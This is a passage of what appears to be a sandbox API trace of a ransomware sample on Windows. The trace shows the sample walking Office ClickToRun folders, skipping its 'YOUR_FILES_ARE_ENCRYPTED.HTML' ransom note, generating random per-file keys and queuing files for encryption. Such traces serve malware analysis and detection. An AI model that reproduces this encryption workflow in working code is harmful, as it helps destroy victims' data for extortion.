nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0104.904] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="..", cAlternateFileName="")) returned 1 [0104.904] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="Packages", cAlternateFileName="")) returned 1 [0104.904] StrStrIW (lpFirst="Packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.904] wnsprintfW (in: pszDest=0x6a3370, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 68 [0104.904] GetProcessHeap () returned 0x600000 [0104.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0104.905] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0104.905] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0104.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63d210, cFileName=".", cAlternateFileName="")) returned 0x626638 [0104.906] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63d210, cFileName="..", cAlternateFileName="")) returned 1 [0104.906] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63d210, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0104.906] StrStrIW (lpFirst="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.906] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 107 [0104.906] GetProcessHeap () returned 0x600000 [0104.906] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2308 [0104.907] lstrcpyW (in: lpString1=0x30f2308, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0104.907] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0104.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f54a, dwReserved1=0x62f4c0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.907] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f54a, dwReserved1=0x62f4c0, cFileName="..", cAlternateFileName="")) returned 1 [0104.907] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x87380caa, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x87380caa, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f54a, dwReserved1=0x62f4c0, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0104.907] StrStrIW (lpFirst="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.907] wnsprintfW (in: pszDest=0x30f2308, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 146 [0104.907] GetProcessHeap () returned 0x600000 [0104.907] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102310 [0104.908] lstrcpyW (in: lpString1=0x3102310, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0104.908] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0104.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x87380caa, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x87380caa, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0104.909] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x87380caa, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x87380caa, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="..", cAlternateFileName="")) returned 1 [0104.909] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7a88c0, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a88c0, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c90210, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="DeploymentConfiguration.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0104.909] StrStrIW (lpFirst="DeploymentConfiguration.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.909] wnsprintfW (in: pszDest=0x3102310, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned 174 [0104.909] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0104.909] lstrlenW (lpString=".xml") returned 4 [0104.909] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0104.909] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0104.909] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0104.909] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=614) returned 1 [0104.909] GetProcessHeap () returned 0x600000 [0104.909] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3113320 [0104.912] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="C5") returned 2 [0104.912] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="5C") returned 2 [0104.912] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="4C") returned 2 [0104.912] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="C3") returned 2 [0104.912] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="38") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="6D") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="39") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="CA") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="67") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="B7") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="EF") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="C9") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="9F") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="2A") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="FE") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="6A") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="87") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="BB") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="37") returned 2 [0104.912] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="27") returned 2 [0104.912] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="D6") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="F6") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="44") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="8E") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="C1") returned 2 [0104.912] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="EE") returned 2 [0104.913] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="2A") returned 2 [0104.913] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="52") returned 2 [0104.913] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="F0") returned 2 [0104.913] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="8A") returned 2 [0104.913] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F4") returned 2 [0104.913] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="56") returned 2 [0104.913] lstrcpyW (in: lpString1=0x31233d4, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" [0104.913] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3113320, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.913] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3113320, lpOverlapped=0x3113320) returned 1 [0104.913] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb33ac2, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1cb33ac2, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1cb9ca40, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4b480e, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="Manifest.xml", cAlternateFileName="")) returned 1 [0104.913] StrStrIW (lpFirst="Manifest.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.913] wnsprintfW (in: pszDest=0x3102310, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned 159 [0104.913] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0104.913] lstrlenW (lpString=".xml") returned 4 [0104.913] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0104.913] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0104.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0104.914] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=4933646) returned 1 [0104.914] GetProcessHeap () returned 0x600000 [0104.914] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b478 [0104.972] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="F1") returned 2 [0104.972] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="93") returned 2 [0104.972] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="70") returned 2 [0104.972] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="58") returned 2 [0104.972] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="16") returned 2 [0104.972] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="E2") returned 2 [0104.972] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="AE") returned 2 [0104.972] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="5C") returned 2 [0104.972] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="AB") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="AE") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="F6") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="C9") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="3E") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="9E") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D0") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="BA") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C5") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="D2") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="80") returned 2 [0104.973] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="38") returned 2 [0104.973] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="27") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="23") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="9C") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="48") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="15") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="DA") returned 2 [0104.973] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="E9") returned 2 [0104.973] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="03") returned 2 [0104.973] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="EC") returned 2 [0104.973] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="0C") returned 2 [0104.973] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="E2") returned 2 [0104.973] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="65") returned 2 [0104.974] lstrcpyW (in: lpString1=0x314b52c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" [0104.974] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x313b478, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.974] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b478, lpOverlapped=0x313b478) returned 1 [0105.030] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db44a9e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1db44a9e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c90210, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="UserDeploymentConfiguration.xml", cAlternateFileName="USERDE~1.XML")) returned 1 [0105.030] StrStrIW (lpFirst="UserDeploymentConfiguration.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.030] wnsprintfW (in: pszDest=0x3102310, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned 178 [0105.030] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0105.030] lstrlenW (lpString=".xml") returned 4 [0105.030] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0105.030] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0105.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.031] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=614) returned 1 [0105.031] GetProcessHeap () returned 0x600000 [0105.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3113320 [0105.033] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="61") returned 2 [0105.033] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="2C") returned 2 [0105.033] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="78") returned 2 [0105.033] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="1D") returned 2 [0105.033] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="E4") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="13") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="AB") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="05") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="B1") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="3D") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="15") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="71") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="D3") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="E4") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="DB") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="38") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="B3") returned 2 [0105.033] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: 